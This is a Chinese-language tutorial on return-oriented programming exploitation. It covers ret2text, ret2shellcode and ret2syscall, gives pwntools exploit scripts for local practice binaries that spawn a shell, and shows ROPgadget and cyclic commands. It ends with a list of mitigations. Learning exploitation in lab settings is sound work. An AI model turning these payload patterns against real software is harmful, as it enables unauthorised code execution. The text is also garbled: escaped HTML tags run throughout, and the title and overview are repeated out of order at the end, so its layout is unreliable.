ROP利用基础教学文档<\/h1>

1. ROP技术概述<\/h2>
ROP(Return-Oriented Programming)是一种高级的内存攻击技术，通过利用程序中已有的代码片段(gadgets)来构造攻击链，绕过数据执行保护(DEP)等安全机制。<\/p>

2. ROP利用基础类型<\/h2>

2.1 ret2text<\/h3>

特征<\/strong>：执行程序.text代码段已有的系统函数调用。<\/p>

利用步骤<\/strong>：<\/p>

检查保护机制<\/strong>：<\/p>
checksec <binary> <\/span><\/span><\/code><\/pre><\/li> IDA分析<\/strong>：<\/p> 查找可调用的system("\/bin\/sh")<\/code>等危险函数<\/li> 识别存在缓冲区溢出漏洞的函数(如gets()<\/code>)<\/li> <\/ul> <\/li> GDB调试关键点<\/strong>：<\/p> 计算可控内存起始地址到返回地址的偏移量<\/li> 确定输入点在栈中的起始地址<\/li> 计算偏移量公式：偏移 = ebp - 输入点地址 + 4 (32位系统) <\/code><\/pre> <\/li> <\/ul> <\/li> Payload构造示例<\/strong>：<\/p> #!\/usr\/bin\/env python<\/span> <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>sh =<\/span> process('.\/ret2text'<\/span>) <\/span><\/span>target =<\/span> 0x804863a<\/span> # system("\/bin\/sh")地址<\/span> <\/span><\/span>sh.<\/span>sendline('A'<\/span> *<\/span> (0x6c<\/span>+<\/span>4<\/span>) +<\/span> p32(target)) <\/span><\/span>sh.<\/span>interactive() <\/span><\/span><\/code><\/pre><\/li> <\/ol> 注意事项<\/strong>：<\/p> 源代码和IDA分析中的变量名可能不一致，需通过GDB确认实际地址<\/li> 确保计算偏移时使用正确的参照物<\/li> <\/ul> 2.2 ret2shellcode<\/h3> 特征<\/strong>：存在可写入shellcode的缓冲区，且具有可执行权限。<\/p> 利用步骤<\/strong>：<\/p> 检查保护机制<\/strong>：<\/p> 确认NX是否关闭(允许栈执行)<\/li> <\/ul> <\/li> 源码分析<\/strong>：<\/p> 确认不存在直接获取shell的函数<\/li> 识别可利用的控制流函数(如gets()<\/code>)<\/li> 确认缓冲区位置(如.bss段)<\/li> <\/ul> <\/li> 权限检查<\/strong>：<\/p> gdb> vmmap # 查看内存分布和权限<\/span> <\/span><\/span><\/code><\/pre> 确认目标缓冲区具有wx(可写可执行)权限<\/li> <\/ul> <\/li> 动态计算偏移<\/strong>：<\/p> 使用cyclic工具生成测试字符串<\/li> 通过崩溃地址计算精确偏移： cyclic -l <fault address> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Payload构造示例<\/strong>：<\/p> #!\/usr\/bin\/env python<\/span> <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>sh =<\/span> process('.\/ret2shellcode'<\/span>) <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>sh()) # 自动生成shellcode<\/span> <\/span><\/span>buf2_addr =<\/span> 0x804a080<\/span> # 可执行缓冲区地址<\/span> <\/span><\/span>sh.<\/span>sendline(shellcode.<\/span>ljust(112<\/span>, 'A'<\/span>) +<\/span> p32(buf2_addr)) <\/span><\/span>sh.<\/span>interactive() <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2.3 ret2syscall<\/h3> 特征<\/strong>：控制程序执行系统调用获取shell。<\/p> 利用步骤<\/strong>：<\/p> 检查保护机制<\/strong><\/p> <\/li> 源码分析<\/strong>：<\/p> 确认没有直接可用的system()或shellcode<\/li> 识别可利用的控制流函数<\/li> <\/ul> <\/li> 系统调用基础<\/strong>：<\/p> execve("\/bin\/sh",NULL,NULL)需要： eax = 0xb (系统调用号)<\/li> ebx -> "\/bin\/sh"字符串地址<\/li> ecx = 0<\/li> edx = 0<\/li> <\/ul> <\/li> 触发：int 0x80<\/li> <\/ul> <\/li> 寻找gadgets<\/strong>：<\/p> 控制eax的gadget： ROPgadget --binary rop --only 'pop|ret'<\/span> | grep 'eax'<\/span> <\/span><\/span><\/code><\/pre><\/li> 控制其他寄存器的gadget： ROPgadget --binary rop --only 'pop|ret'<\/span> | grep 'ebx'<\/span> <\/span><\/span><\/code><\/pre><\/li> 查找"\/bin\/sh"字符串： ROPgadget --binary rop --string '\/bin\/sh'<\/span> <\/span><\/span><\/code><\/pre><\/li> 查找int 0x80： ROPgadget --binary rop --only 'int'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Payload构造示例<\/strong>：<\/p> #!\/usr\/bin\/env python<\/span> <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>sh =<\/span> process('.\/rop'<\/span>) <\/span><\/span>pop_eax_ret =<\/span> 0x080bb196<\/span> <\/span><\/span>pop_edx_ecx_ebx_ret =<\/span> 0x0806eb90<\/span> <\/span><\/span>int_0x80 =<\/span> 0x08049421<\/span> <\/span><\/span>binsh =<\/span> 0x80be408<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> flat([ <\/span><\/span> 'A'<\/span> *<\/span> 112<\/span>, <\/span><\/span> pop_eax_ret, 0xb<\/span>, <\/span><\/span> pop_edx_ecx_ebx_ret, 0<\/span>, 0<\/span>, binsh, <\/span><\/span> int_0x80 <\/span><\/span>]) <\/span><\/span> <\/span><\/span>sh.<\/span>sendline(payload) <\/span><\/span>sh.<\/span>interactive() <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 关键工具和技术<\/h2> checksec<\/strong>：检查二进制文件保护机制<\/li> IDA Pro<\/strong>：静态分析二进制文件<\/li> GDB<\/strong>：动态调试，计算偏移<\/li> ROPgadget<\/strong>：搜索可用gadgets<\/li> cyclic<\/strong>：生成测试字符串和计算偏移<\/li> pwntools<\/strong>：自动化漏洞利用开发<\/li> <\/ol> 4. 注意事项<\/h2> 架构差异：32位和64位系统的调用约定不同<\/li> 地址对齐：确保跳转地址正确<\/li> 保护机制：注意ASLR、NX、Stack Canary等的影响<\/li> 环境一致性：本地和远程环境可能有差异<\/li> 错误处理：考虑可能的各种异常情况<\/li> <\/ol> 5. 扩展知识<\/h2> 高级ROP技术<\/strong>：<\/p> SROP (Sigreturn Oriented Programming)<\/li> BROP (Blind ROP)<\/li> JOP (Jump-Oriented Programming)<\/li> <\/ul> <\/li> 防御措施<\/strong>：<\/p> 控制流完整性(CFI)<\/li> 地址随机化(ASLR)<\/li> 栈保护(Stack Canary)<\/li> <\/ul> <\/li> 现代缓解技术<\/strong>：<\/p> Shadow Stack<\/li> CET (Control-flow Enforcement Technology)<\/li> PAC (Pointer Authentication Codes)<\/li> <\/ul> <\/li> <\/ol>

ROP利用基础教学文档<\/h1>

1. ROP技术概述<\/h2> ROP(Return-Oriented Programming)是一种高级的内存攻击技术，通过利用程序中已有的代码片段(gadgets)来构造攻击链，绕过数据执行保护(DEP)等安全机制。<\/p>

2. ROP利用基础类型<\/h2>

1. ROP技术概述<\/h2>
ROP(Return-Oriented Programming)是一种高级的内存攻击技术，通过利用程序中已有的代码片段(gadgets)来构造攻击链，绕过数据执行保护(DEP)等安全机制。<\/p>